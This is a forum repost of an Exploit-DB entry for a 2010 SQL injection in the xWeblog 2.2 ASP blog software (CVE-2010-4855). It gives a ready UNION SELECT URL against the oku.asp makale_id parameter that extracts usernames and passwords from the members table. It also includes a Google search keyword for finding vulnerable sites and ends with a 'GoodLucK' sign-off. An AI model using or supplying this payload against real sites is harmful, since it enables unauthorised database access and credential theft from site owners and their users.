Exploit xWeblog 2.2 - 'oku.asp?makale_id' SQL Injection

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
15218
Проверка EDB
  1. Пройдено
Автор
KNOCKOUT
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2010-4855
Дата публикации
2010-10-07
Код:
===================================================
xWeblog v2.2 - Remote SQL Injection Vulnerability (tr) 
===================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : xWeblog v2.2
~Software: http://www.aspdunyasi.com/goster.asp?id=19
~Vulnerability Style : (SQLi)
~Google Keywords : "XWEBLOG"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
    ~~~~~~~~ Explotation ~~~~~~~~~~~
 
    SQL Injection
    ================================
    http://TARGET/path/oku.asp?makale_id=-67%20UNION%20SELECT+0,AD,SIFRE,3,4,5,6,7,8,9,10,11,12%20from%20uyeler
    ================================
          [+]  SQL Injected!
 
           
       
      GoodLucK ;)


# Inj3ct0r.com [2010-09-28]
 
Источник
www.exploit-db.com

Похожие темы